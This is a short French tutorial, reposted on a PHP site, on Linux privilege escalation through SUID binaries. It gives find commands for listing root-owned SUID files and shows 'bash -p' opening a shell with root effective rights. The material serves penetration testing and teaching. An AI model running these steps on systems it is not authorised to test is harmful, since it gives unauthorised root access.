Maison  >  Article  >  Opération et maintenance  >  Comment utiliser SUID pour élever les privilèges sous Linux

Comment utiliser SUID pour élever les privilèges sous Linux

WBOY
WBOYavant
2023-05-23 23:52:051769parcourir

SUID est un mécanisme d'autorisation sous Linux Lorsqu'un fichier avec cette autorisation est exécuté, l'appelant obtiendra temporairement les autorisations du propriétaire du fichier. Si vous disposez des autorisations SUID, vous pouvez utiliser les binaires et les outils du système pour effectuer une élévation des privilèges root.

La commande suivante peut découvrir tous les fichiers exécutables SUID exécutés sur le système. Plus précisément, la commande tentera de trouver les fichiers avec un SUID disposant des autorisations root.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

Comment utiliser SUID pour élever les privilèges sous Linux


Comment utiliser SUID pour élever les privilèges sous Linux

Tous les binaires ci-dessus seront exécutés avec les autorisations de l'utilisateur root car leurs autorisations contiennent des "s" et correspondent aux autorisations root.

Bash

La commande suivante ouvrira un shell bash avec les privilèges root.

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Comment utiliser SUID pour élever les privilèges sous Linux

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer